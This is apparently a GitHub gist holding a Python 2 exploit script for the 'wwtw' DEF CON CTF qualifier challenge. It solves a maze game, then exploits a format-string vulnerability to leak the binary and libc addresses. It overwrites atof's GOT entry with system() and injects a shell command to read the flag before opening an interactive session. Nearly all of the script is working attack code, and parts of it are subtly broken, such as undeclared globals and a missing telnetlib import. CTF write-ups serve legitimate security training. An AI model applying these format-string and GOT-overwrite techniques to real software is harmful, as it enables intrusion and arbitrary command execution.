| import socket | |
| import time | |
| import re | |
| from Pwning import * | |
| pl = Payload() | |
| def get_socket(host, port): | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.connect((host, port)) | |
| return s | |
| def send(s, msg): | |
| s.sendall(msg + "\n") | |
| print '[+] Send:', repr(msg) | |
| def recv(s): | |
| data = s.recv(4096) | |
| print data | |
| return data | |
| def recv_until(s, text): | |
| data = '' | |
| while text not in data: | |
| new_data = recv(s) | |
| if new_data == '': | |
| break | |
| data += new_data | |
| if 'TARDIS KEY:' in data: | |
| return data | |
| import time | |
| time.sleep(0.01) | |
| return data | |
| """ | |
| MAZE GAME | |
| """ | |
| g_map = None | |
| g_found = False | |
| g_path = None | |
| MAP_WIDTH = 20 | |
| MAP_HEIGHT = 20 | |
| TARGET_X = 89 | |
| TARGET_Y = 28 | |
| g_best_solution = 'A' * 1000 | |
| def get_valid_moves(moved_cells, x, y): | |
| moves = [] | |
| if x < MAP_WIDTH - 1 and g_map[y][x + 1] != 'A' and moved_cells[y][x + 1] == False: | |
| moves.append('d') | |
| if y < MAP_HEIGHT - 1 and g_map[y + 1][x] != 'A' and moved_cells[y + 1][x] == False: | |
| moves.append('s') | |
| if y > 0 and g_map[y - 1][x] != 'A' and moved_cells[y - 1][x] == False: | |
| moves.append('w') | |
| if x > 0 and g_map[y][x - 1] != 'A' and moved_cells[y][x - 1] == False: | |
| moves.append('a') | |
| return moves | |
| def solve_rec(moved_cells, x, y, curr_path): | |
| global g_best_solution | |
| if g_found: | |
| return | |
| if len(curr_path) > len(g_best_solution): | |
| return | |
| if g_map[x][y] == 'E': | |
| g_found = True | |
| g_path = curr_path | |
| available_moves = get_valid_moves(moved_cells, x, y) | |
| for move in available_moves: | |
| if move == 'w': | |
| next_x = x | |
| next_y = y - 1 | |
| elif move == 's': | |
| next_x = x | |
| next_y = y + 1 | |
| elif move == 'a': | |
| next_x = x - 1 | |
| next_y = y | |
| else: | |
| next_x = x + 1 | |
| next_y = y | |
| curr_path += move | |
| moved_cells[next_y][next_x] = True | |
| solve_rec(moved_cells, next_x, next_y, curr_path) | |
| moved_cells[next_y][next_x] = False | |
| curr_path = curr_path[:-1] # restore | |
| def get_person_position(): | |
| for i in xrange(MAP_HEIGHT): | |
| for j in xrange(MAP_WIDTH): | |
| if g_map[i][j] in '^<>V': | |
| return (i, j) | |
| def get_target_position(): | |
| for i in xrange(MAP_HEIGHT): | |
| for j in xrange(MAP_WIDTH): | |
| if g_map[i][j] in 'ET': | |
| return (i, j) | |
| def get_moves(r, c): | |
| return [(r + 1, c), (r - 1, c), (r, c + 1), (r, c - 1)] | |
| def get_best_move(m): | |
| global g_map | |
| g_map = m | |
| person = get_person_position() | |
| target = get_target_position() | |
| print 'person:', person | |
| print 'target:', target | |
| best_score = 0 | |
| best_position_score = -1000000 | |
| best_position = (0, 0) | |
| for p_r, p_c in get_moves(person[0], person[1]): | |
| nearest_enemy = 1000 | |
| for r in xrange(MAP_HEIGHT): | |
| for c in xrange(MAP_WIDTH): | |
| if g_map[r][c] == 'A': | |
| enemy_distance = abs(r - p_r) + abs(c - p_c) | |
| if enemy_distance < nearest_enemy: | |
| nearest_enemy = enemy_distance | |
| target_distance = abs(target[0] - p_r) + abs(target[1] - p_c) | |
| position_score = nearest_enemy - target_distance * 100 | |
| print (p_r, p_c), nearest_enemy, target_distance, position_score | |
| if position_score > best_position_score and nearest_enemy != 0: | |
| best_position_score = position_score | |
| best_position = (p_r, p_c) | |
| if best_position_score == -1000000: | |
| return None | |
| if best_position[0] < person[0]: | |
| return 'w' | |
| if best_position[0] > person[0]: | |
| return 's' | |
| if best_position[1] < person[1]: | |
| return 'a' | |
| return 'd' | |
| def solve(m): | |
| global g_map | |
| g_map = m | |
| moved_cells = [] | |
| for i in xrange(MAP_HEIGHT): | |
| moved_cells.append([]) | |
| for j in xrange(MAP_WIDTH): | |
| moved_cells[i].append(False) | |
| person_position = get_person_position() | |
| solve_rec(moved_cells, person_position[0], person_position[1], '') | |
| return g_path | |
| """ | |
| MAZE GAME | |
| """ | |
| def read_map(raw): | |
| m = [0] * 20 | |
| for i in xrange(20): | |
| row = raw[i][3:] | |
| m[i] = [c for c in row] | |
| return m | |
| def xor_string(a, b): | |
| if len(a) > len(b): | |
| a, b = b, a | |
| ret = '' | |
| for i in xrange(len(a)): | |
| ret += chr( ord(a[i]) ^ ord(b[i]) ) | |
| return ret | |
| def get_key(): | |
| import string | |
| func = '5589E55383EC24E8DCFBFFFF81C33C410000C745F00A0000008D8306E0FFFF890424E8A1F9FFFF8B83F0FFFFFF8B00890424E8A1F9FFFF8D83B8BEFFFF8945F4EB5E8B45F40FB6000FBEC083E07F890424E832FAFFFF85C07442C7442408010000008D45EE89442404C7042400000000E843F9FFFF83F801751E0FB645EE0FBED08B45F40FB6000FBEC083E07F39C27407B801000000EB28836DF0018345F401837DF000759C90E83CF9FFFF8845EF807DEF0A7406807DEFFF75ECB80000000083C4245B5DC35589E55383EC24E816FBFFFF81C3764000008B45148845E4C745F000000000EB66C7442408010000008D45EF894424048B4508890424E8B7F8FFFF8945F4837DF4007F07B8FFFFFFFFEB58837DF4007507B8FFFFFFFFEB4B0FB645EF3A45E475108B55F08B450C01D0C600008B45F0EB328B45F08D50018955F089C28B450C01C20FB645EF88028B45F03B45107C928B45F08D50FF8B450C01D0C600008B45F083E80183C4245B5DC355'.decode('hex') | |
| key = '' | |
| for c in func: | |
| if chr(ord(c) & 0x7f) in 'abcdefghijklmnopqrstuvwxyz' + 'abcdefghijklmnopqrstuvwxyz'.upper() + '0123456789': | |
| key += chr(ord(c) & 0x7f) | |
| if len(key) == 10: | |
| break | |
| return key | |
| def _solve(): | |
| key = get_key() | |
| while True: | |
| s = get_socket('wwtw_c3722e23150e1d5abbc1c248d99d718d.quals.shallweplayaga.me', 2606) | |
| success = True | |
| while True: | |
| data = recv_until(s, 'Your move (w,a,s,d,q): ') | |
| if 'TARDIS KEY:' in data: | |
| break | |
| raw_map = data.split('Your move (w,a,s,d,q):')[0].split('\n')[-21:-1] | |
| try: | |
| game_map = read_map(raw_map) | |
| except: | |
| success = False | |
| break | |
| best_move = get_best_move(game_map) | |
| if best_move is None: | |
| success = False | |
| break | |
| send(s, best_move) | |
| if success: | |
| send(s, key) | |
| recv(s) | |
| send(s,'\x00'*9) | |
| recv(s) | |
| time.sleep(2) | |
| send(s,pl.p(0x55592B6C + 1)) | |
| recv(s) | |
| send(s,'\x00'*9) | |
| print repr(recv(s)) | |
| send(s,pl.p(0x55592B6C + 1)) | |
| time.sleep(1) | |
| send(s,'1\n') | |
| recv_until(s, 'The TARDIS console is online!') | |
| recv_until(s, 'Selection:') | |
| send(s,'3\n') | |
| recv_until(s, 'Coordinates: ') | |
| send(s,'51.492137,-0.192878 {}\n'.format('%275$p')) | |
| data = recv_until(s, 'would rip a hole in time and space. Choose again.') | |
| match = re.findall(r'.+ (0x[0-9a-f]*) .+',data) | |
| base_bin = int(match[0],16) - 0x1491 | |
| read = base_bin + 0x5010 | |
| atof_got = base_bin + 0x5080 | |
| print 'Base Bin :',hex(base_bin) | |
| recv_until(s, 'Coordinates: ') | |
| send(s,'51.492137,-0.192878 {}\n'.format(pl.p(read) + '%20$s')) | |
| data = recv_until(s, 'would rip a hole in time and space. Choose again.') | |
| print repr(data) | |
| data = data[52:] | |
| read = pl.up(data[4:8]) | |
| printf = pl.up(data[8:12]) | |
| print 'read() : ',hex(read) | |
| print 'printf() : ',hex(printf) | |
| system = read - 0x9aa40 | |
| print 'system() : ',hex(system) | |
| recv_until(s, 'Coordinates: ') | |
| send(s,pl.build32FormatStringBug(atof_got,system,20,'51.492137,-0.192878 ')) | |
| recv_until(s, 'Coordinates: ') | |
| send(s,',,,,,,;cat /home/wwtw/flag;,,,,,,,,\n') | |
| tn = telnetlib.Telnet() | |
| tn.sock = s | |
| tn.interact() | |
| break | |
| _solve() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment